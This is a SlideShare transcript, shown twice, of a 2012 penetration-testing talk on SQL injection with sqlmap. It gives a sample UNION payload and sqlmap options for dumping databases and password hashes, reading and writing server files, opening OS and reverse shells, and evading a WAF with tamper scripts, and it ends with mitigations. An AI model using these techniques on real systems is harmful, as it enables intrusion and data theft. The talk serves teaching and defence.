SlideShare ist ein Scribd-Unternehmen logo

SQLi with sqlmap - Automated SQL Injection

H
Herman Duarte

Slides that I used when I presented @ Confraria VI and Security&IT in November 2012

1 von 30
SQL injection with sqlmap Herman Duarte <hcoduarte@gmail.com> Tuesday, December 4, 12 1
About me Consultant @ INTEGRITY S.A. - www.integrity.pt Penetration testing engagements BSc in Information Systems and Computer Engineering CISSP Associate / ISO27001LA / CCNA Security addict :) Tuesday, December 4, 12 2
Roadmap SQL injection (SQLi) 101 sqlmap Mitigation techniques Wrap-up Tuesday, December 4, 12 3
SQLi 101: Definition Definition: SQL injection occurs when it is possible to inject SQL commands in data-plane input in order to affect the execution of predefined SQL statements It affects any application that uses non-sanitized user-supplied input, in dynamic SQL query constructions (e.g. web apps, fat clients) Cause: Bad programming practices + Lack of knowledge/ awareness Tuesday, December 4, 12 4
SQLi 101: Structure ...?name=robert’ union all select null,@@version,null # Prefix Payload Suffix $query = “SELECT name,status,age FROM user WHERE name=’” . $_REQUEST[‘search’] . “‘ AND age > 42”; Tuesday, December 4, 12 5
sqlmap Developed in python Prerequisites to run sqlmap: Python 2.6.x or 2.7.x To install: git clone https://github.com/sqlmapproject/sqlmap.git sqlmap To update: python sqlmap.py --update git pull Tuesday, December 4, 12 6
sqlmap Mainly developed by: Bernardo Damele A.G. Miroslav Stampar (@inquisb) (@stramparm) Tuesday, December 4, 12 7
sqlmap: Scenarios Find and explore SQL injection in web applications Direct connection (database account is needed) DBMS python binding installed (e.g. PyMySQL) -d <dbms>://<user>:<password>@<ip>:<port>/<db_name> Tuesday, December 4, 12 8
sqlmap: Workflow Select your target Identify possible injection points Identify SQLi vulnerabilities: By using sqlmap Manual testing :) Exploit SQLi vunerabilities: Enumerate File system access OS pwnage Own the internal network (w00t! w00t!) Tuesday, December 4, 12 9
sqlmap: Target selection -u “<url>” (e.g. https://webapp.com/news.php?id=1) -r <request file> GET /news.php?id=1&Submit=Submit HTTP/1.1 Host: webapp.com User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:14.0) Gecko/20100101 Firefox/14.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: https://webapp.com/index.php Cookie: PHPSESSID=l7uo2lheu067qrs8fjj0bab777; DNT: 1 Tuesday, December 4, 12 10
sqlmap: Injection points GET parameters POST parameters Cookie header values (only if --level >= 2) User-Agent header value (only if --level >= 3) Referer header value (only if --level >= 3) Tuesday, December 4, 12 11
sqlmap: Finding SQLi (I) ./sqlmap.py -u “https://webapp.com/news.php?id=1” or ./sqlmap.y -r news_get_request --force-ssl Default behavior: Tests all GET and/or POST parameters, for all SQLi types, for all databases (if not discovered during tests) Yes it may take a long time, and it doesn’t cover all tests sqlmap can do. Tuesday, December 4, 12 12
sqlmap: Finding SQLi (II) --level=<level> (1...5 - default is 1) With --level=5 every combination of payload, prefix and suffix will be tested on all injection points available (noisier but gives more coverage) --risk=<risk> (0...3) - default is 1) To do tests using OR --risk=3. Why? Imagine this: UPDATE user SET disabled=1 WHERE email=email@email.com OR 1=1# -p <param to test>[, <param to test>] Tuesday, December 4, 12 13
sqlmap: SQLi techniques/types --technique=SU (default is all of them: BEUST) Boolean-based blind Based on page changes, data is inferred, char by char Error-based Uses the errors that are displayed to extract data Union query-based Changes the SQL queries to extract data Stacked queries Semi-colon are used to inject multiple statements on the SQL query Time-based blind Based on time, data is inferred, char by char Tuesday, December 4, 12 14
sqlmap: Supported DBMSs --dbms=mssql | mysql | postgresql | oracle ... Microsoft SQL Server SAP MaxDB MySQL Sybase PostgreSQL Firebird Oracle SQLite IBM DB2 Microsoft Access Tuesday, December 4, 12 15
sqlmap: Logging / Verbosity Logs all HTTP traffic in a text file: -t <output file> Save options used in command line: --save <file> Verbosity : -v <0..6> (default 1) -v 6 same as -t but, output to console Tuesday, December 4, 12 16
sqlmap: Enumeration (I) Objective: Get data from the DBMS tables (limited the privileges the current DBMS user have) What can you get: DBMS exact version, O.S. information, architecture and patch level: -f DBMS banner: -b DBMS server hostname: --hostname DBMS user the application is using: --current-user Applications current DB: --current-db If the current user is a DBA: --is-dba Tuesday, December 4, 12 17
sqlmap: Enumeration (II) What can you get: ... List the DBMS users: --users List all DBMS users, password hashes: --passwords sqlmap will automatically try to crack the hashes with a dictionary attack List users privileges: --privileges List all available databases: --dbs List all tables or just for a specific database: --tables (-D <database name>) Tuesday, December 4, 12 18
sqlmap: Enumeration (III) What can you get: ... List all columns or just for a specific table from that database: --columns (-T <table name> -D <db name>) Count table entries: --count Dump data from a database/table/column: --dump (-D, -T, -C can be used to select what data to dump) --dump-all (I don’t recommend it) Search for a specific or part of a database name, table name or column name: --search= (-D, -T, -C to specify what to search) Tuesday, December 4, 12 19
sqlmap: Enumeration (IV) What can you get: ... Executing a custom SQL query: --sql-query=”<sql query to execute>” Interactive SQL shell to execute all your custom SQL queries: --sql-shell Tuesday, December 4, 12 20
sqlmap: File system access Objective: Read and write any textual or binary file from the DBMS O.S. Prerequisites: DBMS = mssql | mysql | postgresql Current DBMS user must have the necessary privileges Read: --file-read=”<file path>” Write: --file-write=”<file local path>” --file-dest=”<remote file location path>” Tuesday, December 4, 12 21
sqlmap: OS pwnage (I) Objective: Get access to the DBMS O.S. and the Internal network (if DBMS server in the internal network) Prerequisites: DBMS = mssql | mysql | postgresql Current DBMS user must have the necessary privileges What can you do? Get a reverse shell if the DB can: connect to the internet ping your server (yes an icmp shell :)) Establish a VNC connection Tuesday, December 4, 12 22
sqlmap: OS pwnage (II) To execute an OS command: --os-cmd=”<command to execute>” To get an OS shell: --os-shell To get a meterpreter shell, an icmpshell or VNC: --os-pwn --msf-path=”<msf path>” Store procedure privilege escalation (buffer overflow): --bof Tuesday, December 4, 12 23
sqlmap: Tamper scripts Tamper scripts: --tamper <script file path>[,<script file path>] tamper/bluecoat.py def tamper(payload, headers=None): Example: * Input: SELECT id FROM users where id = 1 * Output: SELECT%09id FROM users where id LIKE 1 Requirement: * MySQL, Blue Coat SGOS with WAF activated as documented in https://kb.bluecoat.com/index?page=content&id=FAQ2147 if payload: retVal = re.sub(r"(?i)(SELECT|UPDATE|INSERT|DELETE)s+", r"g<1>t", payload) retVal = re.sub(r"s*=s*", " LIKE ", retVal) Tuesday, December 4, 12 24
sqlmap DEMO Tuesday, December 4, 12 25
sqlmap: Tips If HTTPS is being used, don’t forget to set: --force-ssl Get the most info as you can before starting to find SQLi vulnerabilities. It will save you time. Union-based gives more data with less requests, use it Time-based blind SQLi is faster to check in comparison to Union-based query (in cases where a lot of columns are used) If --is-dba=true, --technique=S you can start to gangnam style Tuesday, December 4, 12 26
Mitigation Techniques Sanitize input Use prepared statements / bind variables Configure DBMS users configured with least-privilege principle in mind Use generic errors don’t pass them to the user In case the web application source code can’t be changed, a proxy can be used, between the web server and the database server (e.g. GreenSQL) Tuesday, December 4, 12 27
Wrap-up Input sanitization Use prepared statements Least-privilege principle is your friend (use it!) Have I said to use prepared statements ?! :) Do code reviews Tuesday, December 4, 12 28
References https://sqlmap.org Advanced SQL injection to operating system full control - http://www.slideshare.net/inquis/advanced- sql-injection-to-operating-system-full-control- whitepaper-4633857 SQL Injection Attacks and Defenses - http:// www.amazon.com/Injection-Attacks-Defense-Justin- Clarke/dp/1597494240 Tuesday, December 4, 12 29
Thank You! Q&A Herman Duarte @hdontwit https://www.linkedin.com/in/hcoduarte hcoduarte@gmail.com Tuesday, December 4, 12 30

Empfohlen

SQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads UpSQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads UpMindfire Solutions
 
Sqlmap
SqlmapSqlmap
SqlmapRushikesh Kulkarni
 
Sqlmap
SqlmapSqlmap
Sqlmapshamshad9
 
Sqlmap
SqlmapSqlmap
SqlmapInstitute of Information Security (IIS)
 
SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)Bernardo Damele A. G.
 
Sql Injection 0wning Enterprise
Sql Injection 0wning EnterpriseSql Injection 0wning Enterprise
Sql Injection 0wning Enterprisen|u - The Open Security Community
 
Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testingNapendra Singh
 
Sql injection
Sql injectionSql injection
Sql injectionHemendra Kumar
 

Empfohlen

SQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads UpSQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads UpMindfire Solutions
 
Sqlmap
SqlmapSqlmap
SqlmapRushikesh Kulkarni
 
Sqlmap
SqlmapSqlmap
Sqlmapshamshad9
 
Sqlmap
SqlmapSqlmap
SqlmapInstitute of Information Security (IIS)
 
SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)Bernardo Damele A. G.
 
Sql Injection 0wning Enterprise
Sql Injection 0wning EnterpriseSql Injection 0wning Enterprise
Sql Injection 0wning Enterprisen|u - The Open Security Community
 
Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testingNapendra Singh
 
Sql injection
Sql injectionSql injection
Sql injectionHemendra Kumar
 
Spring Framework
Spring Framework Spring Framework
Spring Framework tola99
 
Sql injection
Sql injectionSql injection
Sql injectionZidh
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONMentorcs
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and preventionhelloanand
 
SQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationSQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationRapid Purple
 
Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)Bernardo Damele A. G.
 
How to identify and prevent SQL injection
How to identify and prevent SQL injection How to identify and prevent SQL injection
How to identify and prevent SQL injection Eguardian Global Services
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injectionashish20012
 
sqlmap internals
sqlmap internalssqlmap internals
sqlmap internalsMiroslav Stampar
 
Dapper
DapperDapper
DapperSuresh Loganatha
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySandip Chaudhari
 
A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionSina Manavi
 
sqlmap - security development in Python
sqlmap - security development in Pythonsqlmap - security development in Python
sqlmap - security development in PythonMiroslav Stampar
 
Sql injection in cybersecurity
Sql injection in cybersecuritySql injection in cybersecurity
Sql injection in cybersecuritySanad Bhowmik
 
Sql injection
Sql injectionSql injection
Sql injectionNitish Kumar
 
Sql injection
Sql injectionSql injection
Sql injectionNuruzzaman Milon
 
DNS exfiltration using sqlmap
DNS exfiltration using sqlmapDNS exfiltration using sqlmap
DNS exfiltration using sqlmapMiroslav Stampar
 
Asp objects
Asp objectsAsp objects
Asp objectsKavya Bhaisora
 
Spring Web MVC
Spring Web MVCSpring Web MVC
Spring Web MVCzeeshanhanif
 
SQL injection prevention techniques
SQL injection prevention techniquesSQL injection prevention techniques
SQL injection prevention techniquesSongchaiDuangpan
 
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012Scott Sutherland
 
Practical Approach towards SQLi ppt
Practical Approach towards SQLi pptPractical Approach towards SQLi ppt
Practical Approach towards SQLi pptAhamed Saleem
 

Weitere ähnliche Inhalte

Was ist angesagt?

Spring Framework
Spring Framework Spring Framework
Spring Framework tola99
 
Sql injection
Sql injectionSql injection
Sql injectionZidh
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONMentorcs
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and preventionhelloanand
 
SQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationSQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationRapid Purple
 
Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)Bernardo Damele A. G.
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injectionashish20012
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySandip Chaudhari
 
A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionSina Manavi
 
sqlmap - security development in Python
sqlmap - security development in Pythonsqlmap - security development in Python
sqlmap - security development in PythonMiroslav Stampar
 
Sql injection in cybersecurity
Sql injection in cybersecuritySql injection in cybersecurity
Sql injection in cybersecuritySanad Bhowmik
 
DNS exfiltration using sqlmap
DNS exfiltration using sqlmapDNS exfiltration using sqlmap
DNS exfiltration using sqlmapMiroslav Stampar
 
SQL injection prevention techniques
SQL injection prevention techniquesSQL injection prevention techniques
SQL injection prevention techniquesSongchaiDuangpan
 

Was ist angesagt? (20)

Spring Framework
Spring Framework Spring Framework
Spring Framework
 
Sql injection
Sql injectionSql injection
Sql injection
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and prevention
 
SQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationSQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint Presentation
 
Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)
 
How to identify and prevent SQL injection
How to identify and prevent SQL injection How to identify and prevent SQL injection
How to identify and prevent SQL injection
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injection
 
sqlmap internals
sqlmap internalssqlmap internals
sqlmap internals
 
Dapper
DapperDapper
Dapper
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and Security
 
A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL Injection
 
sqlmap - security development in Python
sqlmap - security development in Pythonsqlmap - security development in Python
sqlmap - security development in Python
 
Sql injection in cybersecurity
Sql injection in cybersecuritySql injection in cybersecurity
Sql injection in cybersecurity
 
Sql injection
Sql injectionSql injection
Sql injection
 
Sql injection
Sql injectionSql injection
Sql injection
 
DNS exfiltration using sqlmap
DNS exfiltration using sqlmapDNS exfiltration using sqlmap
DNS exfiltration using sqlmap
 
Asp objects
Asp objectsAsp objects
Asp objects
 
Spring Web MVC
Spring Web MVCSpring Web MVC
Spring Web MVC
 
SQL injection prevention techniques
SQL injection prevention techniquesSQL injection prevention techniques
SQL injection prevention techniques
 

Ähnlich wie SQLi with sqlmap - Automated SQL Injection

SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012Scott Sutherland
 
Practical Approach towards SQLi ppt
Practical Approach towards SQLi pptPractical Approach towards SQLi ppt
Practical Approach towards SQLi pptAhamed Saleem
 
Playing With (B)Sqli
Playing With (B)SqliPlaying With (B)Sqli
Playing With (B)SqliChema Alonso
 
Php classes in mumbai
Php classes in mumbaiPhp classes in mumbai
Php classes in mumbaiaadi Surve
 
Sql injection manish file
Sql injection manish fileSql injection manish file
Sql injection manish fileyukta888
 
NonStop SQL/MX DBS Explained
NonStop SQL/MX DBS ExplainedNonStop SQL/MX DBS Explained
NonStop SQL/MX DBS ExplainedFrans Jongma
 
Why Managed Service Providers Should Embrace Container Technology
Why Managed Service Providers Should Embrace Container TechnologyWhy Managed Service Providers Should Embrace Container Technology
Why Managed Service Providers Should Embrace Container TechnologySagi Brody
 
WWHF 2018 - Using PowerUpSQL and goddi for Active Directory Information Gathe...
WWHF 2018 - Using PowerUpSQL and goddi for Active Directory Information Gathe...WWHF 2018 - Using PowerUpSQL and goddi for Active Directory Information Gathe...
WWHF 2018 - Using PowerUpSQL and goddi for Active Directory Information Gathe...ThomasElling1
 
Architecting cloud
Architecting cloudArchitecting cloud
Architecting cloudTahsin Hasan
 
MySQL for Oracle DBAs
MySQL for Oracle DBAsMySQL for Oracle DBAs
MySQL for Oracle DBAsMark Leith
 
MySQL Without the MySQL -- Oh My!
MySQL Without the MySQL -- Oh My!MySQL Without the MySQL -- Oh My!
MySQL Without the MySQL -- Oh My!Dave Stokes
 
Database Connection With Mysql
Database Connection With MysqlDatabase Connection With Mysql
Database Connection With MysqlHarit Kothari
 
Andriy Zrobok "MS SQL 2019 - new for Big Data Processing"
Andriy Zrobok "MS SQL 2019 - new for Big Data Processing"Andriy Zrobok "MS SQL 2019 - new for Big Data Processing"
Andriy Zrobok "MS SQL 2019 - new for Big Data Processing"Lviv Startup Club
 
Postgre sql best_practices
Postgre sql best_practicesPostgre sql best_practices
Postgre sql best_practicesJacques Kostic
 
Monitoring MySQL with DTrace/SystemTap
Monitoring MySQL with DTrace/SystemTapMonitoring MySQL with DTrace/SystemTap
Monitoring MySQL with DTrace/SystemTapPadraig O'Sullivan
 
Caching and tuning fun for high scalability
Caching and tuning fun for high scalabilityCaching and tuning fun for high scalability
Caching and tuning fun for high scalabilityWim Godden
 

Ähnlich wie SQLi with sqlmap - Automated SQL Injection (20)

SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012
 
Practical Approach towards SQLi ppt
Practical Approach towards SQLi pptPractical Approach towards SQLi ppt
Practical Approach towards SQLi ppt
 
Playing With (B)Sqli
Playing With (B)SqliPlaying With (B)Sqli
Playing With (B)Sqli
 
Php classes in mumbai
Php classes in mumbaiPhp classes in mumbai
Php classes in mumbai
 
Sql injection manish file
Sql injection manish fileSql injection manish file
Sql injection manish file
 
Sqlmap
SqlmapSqlmap
Sqlmap
 
PHP - Intriduction to MySQL And PHP
PHP - Intriduction to MySQL And PHPPHP - Intriduction to MySQL And PHP
PHP - Intriduction to MySQL And PHP
 
NonStop SQL/MX DBS Explained
NonStop SQL/MX DBS ExplainedNonStop SQL/MX DBS Explained
NonStop SQL/MX DBS Explained
 
Why Managed Service Providers Should Embrace Container Technology
Why Managed Service Providers Should Embrace Container TechnologyWhy Managed Service Providers Should Embrace Container Technology
Why Managed Service Providers Should Embrace Container Technology
 
WWHF 2018 - Using PowerUpSQL and goddi for Active Directory Information Gathe...
WWHF 2018 - Using PowerUpSQL and goddi for Active Directory Information Gathe...WWHF 2018 - Using PowerUpSQL and goddi for Active Directory Information Gathe...
WWHF 2018 - Using PowerUpSQL and goddi for Active Directory Information Gathe...
 
Architecting cloud
Architecting cloudArchitecting cloud
Architecting cloud
 
Rapid Home Provisioning
Rapid Home ProvisioningRapid Home Provisioning
Rapid Home Provisioning
 
MySQL for Oracle DBAs
MySQL for Oracle DBAsMySQL for Oracle DBAs
MySQL for Oracle DBAs
 
MySQL Without the MySQL -- Oh My!
MySQL Without the MySQL -- Oh My!MySQL Without the MySQL -- Oh My!
MySQL Without the MySQL -- Oh My!
 
Database Connection With Mysql
Database Connection With MysqlDatabase Connection With Mysql
Database Connection With Mysql
 
Andriy Zrobok "MS SQL 2019 - new for Big Data Processing"
Andriy Zrobok "MS SQL 2019 - new for Big Data Processing"Andriy Zrobok "MS SQL 2019 - new for Big Data Processing"
Andriy Zrobok "MS SQL 2019 - new for Big Data Processing"
 
Postgre sql best_practices
Postgre sql best_practicesPostgre sql best_practices
Postgre sql best_practices
 
Monitoring MySQL with DTrace/SystemTap
Monitoring MySQL with DTrace/SystemTapMonitoring MySQL with DTrace/SystemTap
Monitoring MySQL with DTrace/SystemTap
 
Postgre sql best_practices
Postgre sql best_practicesPostgre sql best_practices
Postgre sql best_practices
 
Caching and tuning fun for high scalability
Caching and tuning fun for high scalabilityCaching and tuning fun for high scalability
Caching and tuning fun for high scalability
 

SQLi with sqlmap - Automated SQL Injection

  • 1. SQL injection with sqlmap Herman Duarte <hcoduarte@gmail.com> Tuesday, December 4, 12 1
  • 2. About me Consultant @ INTEGRITY S.A. - www.integrity.pt Penetration testing engagements BSc in Information Systems and Computer Engineering CISSP Associate / ISO27001LA / CCNA Security addict :) Tuesday, December 4, 12 2
  • 3. Roadmap SQL injection (SQLi) 101 sqlmap Mitigation techniques Wrap-up Tuesday, December 4, 12 3
  • 4. SQLi 101: Definition Definition: SQL injection occurs when it is possible to inject SQL commands in data-plane input in order to affect the execution of predefined SQL statements It affects any application that uses non-sanitized user-supplied input, in dynamic SQL query constructions (e.g. web apps, fat clients) Cause: Bad programming practices + Lack of knowledge/ awareness Tuesday, December 4, 12 4
  • 5. SQLi 101: Structure ...?name=robert’ union all select null,@@version,null # Prefix Payload Suffix $query = “SELECT name,status,age FROM user WHERE name=’” . $_REQUEST[‘search’] . “‘ AND age > 42”; Tuesday, December 4, 12 5
  • 6. sqlmap Developed in python Prerequisites to run sqlmap: Python 2.6.x or 2.7.x To install: git clone https://github.com/sqlmapproject/sqlmap.git sqlmap To update: python sqlmap.py --update git pull Tuesday, December 4, 12 6
  • 7. sqlmap Mainly developed by: Bernardo Damele A.G. Miroslav Stampar (@inquisb) (@stramparm) Tuesday, December 4, 12 7
  • 8. sqlmap: Scenarios Find and explore SQL injection in web applications Direct connection (database account is needed) DBMS python binding installed (e.g. PyMySQL) -d <dbms>://<user>:<password>@<ip>:<port>/<db_name> Tuesday, December 4, 12 8
  • 9. sqlmap: Workflow Select your target Identify possible injection points Identify SQLi vulnerabilities: By using sqlmap Manual testing :) Exploit SQLi vunerabilities: Enumerate File system access OS pwnage Own the internal network (w00t! w00t!) Tuesday, December 4, 12 9
  • 10. sqlmap: Target selection -u “<url>” (e.g. https://webapp.com/news.php?id=1) -r <request file> GET /news.php?id=1&Submit=Submit HTTP/1.1 Host: webapp.com User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:14.0) Gecko/20100101 Firefox/14.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: https://webapp.com/index.php Cookie: PHPSESSID=l7uo2lheu067qrs8fjj0bab777; DNT: 1 Tuesday, December 4, 12 10
  • 11. sqlmap: Injection points GET parameters POST parameters Cookie header values (only if --level >= 2) User-Agent header value (only if --level >= 3) Referer header value (only if --level >= 3) Tuesday, December 4, 12 11
  • 12. sqlmap: Finding SQLi (I) ./sqlmap.py -u “https://webapp.com/news.php?id=1” or ./sqlmap.y -r news_get_request --force-ssl Default behavior: Tests all GET and/or POST parameters, for all SQLi types, for all databases (if not discovered during tests) Yes it may take a long time, and it doesn’t cover all tests sqlmap can do. Tuesday, December 4, 12 12
  • 13. sqlmap: Finding SQLi (II) --level=<level> (1...5 - default is 1) With --level=5 every combination of payload, prefix and suffix will be tested on all injection points available (noisier but gives more coverage) --risk=<risk> (0...3) - default is 1) To do tests using OR --risk=3. Why? Imagine this: UPDATE user SET disabled=1 WHERE email=email@email.com OR 1=1# -p <param to test>[, <param to test>] Tuesday, December 4, 12 13
  • 14. sqlmap: SQLi techniques/types --technique=SU (default is all of them: BEUST) Boolean-based blind Based on page changes, data is inferred, char by char Error-based Uses the errors that are displayed to extract data Union query-based Changes the SQL queries to extract data Stacked queries Semi-colon are used to inject multiple statements on the SQL query Time-based blind Based on time, data is inferred, char by char Tuesday, December 4, 12 14
  • 15. sqlmap: Supported DBMSs --dbms=mssql | mysql | postgresql | oracle ... Microsoft SQL Server SAP MaxDB MySQL Sybase PostgreSQL Firebird Oracle SQLite IBM DB2 Microsoft Access Tuesday, December 4, 12 15
  • 16. sqlmap: Logging / Verbosity Logs all HTTP traffic in a text file: -t <output file> Save options used in command line: --save <file> Verbosity : -v <0..6> (default 1) -v 6 same as -t but, output to console Tuesday, December 4, 12 16
  • 17. sqlmap: Enumeration (I) Objective: Get data from the DBMS tables (limited the privileges the current DBMS user have) What can you get: DBMS exact version, O.S. information, architecture and patch level: -f DBMS banner: -b DBMS server hostname: --hostname DBMS user the application is using: --current-user Applications current DB: --current-db If the current user is a DBA: --is-dba Tuesday, December 4, 12 17
  • 18. sqlmap: Enumeration (II) What can you get: ... List the DBMS users: --users List all DBMS users, password hashes: --passwords sqlmap will automatically try to crack the hashes with a dictionary attack List users privileges: --privileges List all available databases: --dbs List all tables or just for a specific database: --tables (-D <database name>) Tuesday, December 4, 12 18
  • 19. sqlmap: Enumeration (III) What can you get: ... List all columns or just for a specific table from that database: --columns (-T <table name> -D <db name>) Count table entries: --count Dump data from a database/table/column: --dump (-D, -T, -C can be used to select what data to dump) --dump-all (I don’t recommend it) Search for a specific or part of a database name, table name or column name: --search= (-D, -T, -C to specify what to search) Tuesday, December 4, 12 19
  • 20. sqlmap: Enumeration (IV) What can you get: ... Executing a custom SQL query: --sql-query=”<sql query to execute>” Interactive SQL shell to execute all your custom SQL queries: --sql-shell Tuesday, December 4, 12 20
  • 21. sqlmap: File system access Objective: Read and write any textual or binary file from the DBMS O.S. Prerequisites: DBMS = mssql | mysql | postgresql Current DBMS user must have the necessary privileges Read: --file-read=”<file path>” Write: --file-write=”<file local path>” --file-dest=”<remote file location path>” Tuesday, December 4, 12 21
  • 22. sqlmap: OS pwnage (I) Objective: Get access to the DBMS O.S. and the Internal network (if DBMS server in the internal network) Prerequisites: DBMS = mssql | mysql | postgresql Current DBMS user must have the necessary privileges What can you do? Get a reverse shell if the DB can: connect to the internet ping your server (yes an icmp shell :)) Establish a VNC connection Tuesday, December 4, 12 22
  • 23. sqlmap: OS pwnage (II) To execute an OS command: --os-cmd=”<command to execute>” To get an OS shell: --os-shell To get a meterpreter shell, an icmpshell or VNC: --os-pwn --msf-path=”<msf path>” Store procedure privilege escalation (buffer overflow): --bof Tuesday, December 4, 12 23
  • 24. sqlmap: Tamper scripts Tamper scripts: --tamper <script file path>[,<script file path>] tamper/bluecoat.py def tamper(payload, headers=None): Example: * Input: SELECT id FROM users where id = 1 * Output: SELECT%09id FROM users where id LIKE 1 Requirement: * MySQL, Blue Coat SGOS with WAF activated as documented in https://kb.bluecoat.com/index?page=content&id=FAQ2147 if payload: retVal = re.sub(r"(?i)(SELECT|UPDATE|INSERT|DELETE)s+", r"g<1>t", payload) retVal = re.sub(r"s*=s*", " LIKE ", retVal) Tuesday, December 4, 12 24
  • 25. sqlmap DEMO Tuesday, December 4, 12 25
  • 26. sqlmap: Tips If HTTPS is being used, don’t forget to set: --force-ssl Get the most info as you can before starting to find SQLi vulnerabilities. It will save you time. Union-based gives more data with less requests, use it Time-based blind SQLi is faster to check in comparison to Union-based query (in cases where a lot of columns are used) If --is-dba=true, --technique=S you can start to gangnam style Tuesday, December 4, 12 26
  • 27. Mitigation Techniques Sanitize input Use prepared statements / bind variables Configure DBMS users configured with least-privilege principle in mind Use generic errors don’t pass them to the user In case the web application source code can’t be changed, a proxy can be used, between the web server and the database server (e.g. GreenSQL) Tuesday, December 4, 12 27
  • 28. Wrap-up Input sanitization Use prepared statements Least-privilege principle is your friend (use it!) Have I said to use prepared statements ?! :) Do code reviews Tuesday, December 4, 12 28
  • 29. References https://sqlmap.org Advanced SQL injection to operating system full control - http://www.slideshare.net/inquis/advanced- sql-injection-to-operating-system-full-control- whitepaper-4633857 SQL Injection Attacks and Defenses - http:// www.amazon.com/Injection-Attacks-Defense-Justin- Clarke/dp/1597494240 Tuesday, December 4, 12 29
  • 30. Thank You! Q&A Herman Duarte @hdontwit https://www.linkedin.com/in/hcoduarte hcoduarte@gmail.com Tuesday, December 4, 12 30